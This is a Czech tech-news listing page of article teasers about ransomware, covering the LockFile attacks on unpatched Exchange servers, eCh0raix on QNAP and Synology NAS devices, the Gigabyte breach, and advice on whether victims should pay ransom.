    Cisco Talos varuje, že jednou z nejčatějších slabin podnikové bezpečnosti je absence vícefaktorového ověření. Právě tohoto nedostatku často využívají hackeři a napadají organizace vyděračským softwarem.
    staré Na nezáplatované servery Microsoft Exchange útočí nový ransomware LockFile
    Nový ransomwarový gang, označovaný jako LockFile, útočí na servery postavené na MS Windows. K průniku používá sadu tří zřetězených zranitelností ProxyShell, jež byly odhaleny v Exchange Serveru. Tyto zranitelnosti dovolují útočníkům vzdáleně spouštět škodlivý kód. Zranitelnosti odhalil ...
    staré Ransomware eCh0raix šifruje síťová úložiště QNAP a Synology, v ohrožení je 250 tisíc NASů
    Bezpečnostní experti varují před ransomwarem eCh0raix • Umí útočit na NASy značek QNAP i Synology • V ohrožení je čtvrt milionu zařízení
    staré Gigabyte napadl ransomware, uniknout měly i citlivé dokumenty Intelu a AMD
    Společnost Gigabyte byla napadena ransomwarem, což obvykle znamená zašifrování důležitých dat a žádost o zaplacení za vydání dešifrovacího klíče. Ovšem v tomto případě jde i o možné zveřejnění citlivých dokumentů o plánech AMD a Intelu. 
    staré Existuje nějaká pojistka proti ransomware útokům?
    Poznejte Bitdefender Ransomare Remediation funkci, která vám dodá bezpečí.
    staré [článek] Ransomware REvil útočí, TikTok jede a Steve Wozniak je pro právo na opravu
    [8 minut čtení] Hudební startupy, kontroverze okolo Audacity, GETTR hacknut, DiDi v nemilosti, VISA jde do krypto plateb. Co ještě přinesl končící #tyden? Skvělé čtení o růstu TikToku a o tom, co vše to obnáší i jak to vypadá vůči růstu Facebooku či YouTube. Pochopitelně jsou základem velké peníze. Investice do reklamy, ale hlavně do obsahu. Neméně podstatný je algoritmus TikToku. Perfektně fungující vytváření nevídané míry závislosti uživatelů.
    staré Zaplatit nebo nezaplatit výkupné v případě ransomware útoku? Poradíme, co dělat, pokud jste obětí
    Ransomware je poměrně nebezpečný typ vyděračského software, který na napadaném zařízení (počítač, smartphone, NAS…) dokáže zašifrovat data. Abyste k nim získali zpět přístup, požadují často útočný poměrně tučné výkupné. Tento typ nebezpečného software byl zpočátku populární především v Rusku, ale v roce 2012 se poměrně agresivně začal šířit po celém světě. Společnost Check Point Software varuje, že průměrný týdenní počet ransomwarových útoků vzrostl za uplynulých 12 měsíců o 93 %. Každý týden se více než 1200 organizací na světě stane obětí vyděračského útoku, v ohrožení jsou všechny organizace, bez výjimky. Jak vyplývá z dat společnosti Cybersecurity Ventures, škody způsobené ransomwarem dosáhnout letos částky přibližně 20 miliard dolarů, což je 57násobný nárůst oproti roku 2015. Do roku 2031 by náklady na ransomwarové incidenty mohly dokonce překonat těžko uvěřitelnou částku 265 miliard dolarů. Pro hackery je ransomware zlatý důl Počet ransomwarových útoků roste z prostého důvodu, hackerům se vyplácí. Ochota zaplatit vytváří nebezpečnou smyčku … Přečtěte si celý článek Zaplatit nebo nezaplatit výkupné v případě ransomware útoku? Poradíme, co dělat, pokud jste obětí
  • Zaplatit nebo nezaplatit výkupné v případě ransomware útoku? Poradíme, co dělat, pokud jste obětí
  • actual not cached